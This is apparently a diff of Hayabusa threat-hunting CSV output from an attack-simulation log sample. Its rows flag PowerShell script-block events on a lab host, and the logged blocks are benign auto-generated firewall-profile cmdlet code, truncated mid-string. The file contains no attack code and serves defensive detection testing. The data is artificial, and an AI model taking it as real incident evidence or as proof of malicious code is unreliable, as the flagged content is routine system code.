[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdletization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cm",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdletization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cm",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"dletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType 